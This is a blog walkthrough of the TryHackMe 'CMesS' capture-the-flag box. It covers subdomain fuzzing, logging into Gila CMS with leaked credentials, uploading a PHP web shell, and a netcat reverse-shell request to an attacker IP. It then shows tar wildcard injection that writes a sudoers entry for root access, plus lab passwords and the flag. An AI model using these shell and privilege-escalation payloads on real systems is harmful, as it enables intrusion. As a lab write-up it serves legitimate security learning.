THM - CMesS | An ordinary day

Introduction

Can you root this Gila CMS box?

This is a medium rated box, and we already know it runs Gila CMS from the title. Let’s begin.

Ports

nmap says we’ve got 22 (SSH) and 80 (HTTP) only; web all the way?

Webserver

Checking searchsploit before doing much else, we can see there a couple of different authenticated RCE exploits for different versions of Gila, so presumably we’re going to need some creds.

We can do some gobusting/dirbusting and turn up plenty of links, but nothing very fruitful. Checking the Gila documentation doesn’t help much either.

Subdomains

We can use WFUZZ to fuzz for subdomains, so let’s do that:

wfuzz -c -f sub-fighter -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://cmess.thm" -H "Host: FUZZ.cmess.thm" -t 42 --hl 1

Note: this command is NOT optimised - it didn’t filter out bad results. But quickly scanning through it revealed one good result - dev.cmess.thm.

We add dev.cmess.thm to our /etc/hosts and continue

dev.cmess.thm

This is a simple page that exists (essentially) purely for the purpose of giving us credentials. Yes, these CTFs are somewhat contrived.

andre@cmess.thm:KPFTN_f2yxe%

In Gila

Once we log in and poke around for a bit, we find we can upload a file. I do shell.phtml with the contents:

<?php system($_GET['cmd']);?>

Once we’ve got that we can send it a reverse shell command with Burp Suite:

GET /tmp/media_thumb/shell.phtml?cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.9.10.123+1234+>/tmp/f HTTP/1.1

On the box

We grabbed the credentials for the SQL login earlier when we were poking around in Gila: root:r0otus3rpassw0rd.

We can login to SQL:

www-data@cmess:/$ mysql --host=127.0.0.1 --port 3306 -u root -p  
Enter password: r0otus3rpassw0rd
etc.
mysql> select * from user;

And with that we grab andre’s hash:
$2y$10$uNAA0MEze02jd.qU9tnYLu43bNo9nujltElcWEAcifNeZdk4bEsBa

But to make it even easier we can find the password (UQfsdCB7aAP6) for andre in /opt/.password.bak and then we can su andre.

Andre

Linpeas points to a cronjob:

root cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz *

This was a new one to me. At first I thought I could replace tar, but cron has it’s own PATH:

PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

And I can’t write to any of these directories. So now what? Well, there are a class of tar exploits that I wasn’t previously aware of. This site provides an explanation and examples. Here’s what I did:

andre@cmess:/home/andre/backup$ echo 'echo "andre ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > test.sh
andre@cmess:/home/andre/backup$ echo "" > "--checkpoint-action=exec=sh test.sh"                      
andre@cmess:/home/andre/backup$ echo "" > --checkpoint=1                                             
andre@cmess:/home/andre/backup$ tar cf archive.tar *
test.sh: 1: test.sh: cannot create /etc/sudoers: Permission denied

andre@cmess:/home/andre/backup$ sudo -l
User andre may run the following commands on cmess:
    (root) NOPASSWD: ALL
andre@cmess:/home/andre/backup$ sudo /bin/bash
root@cmess:/home/andre/backup# cat /root/root.txt
thm{9f85b7fdeb2cf96985bf5761a93546a2}

To be honest, I don’t really understand why this works, but it does. More things to learn.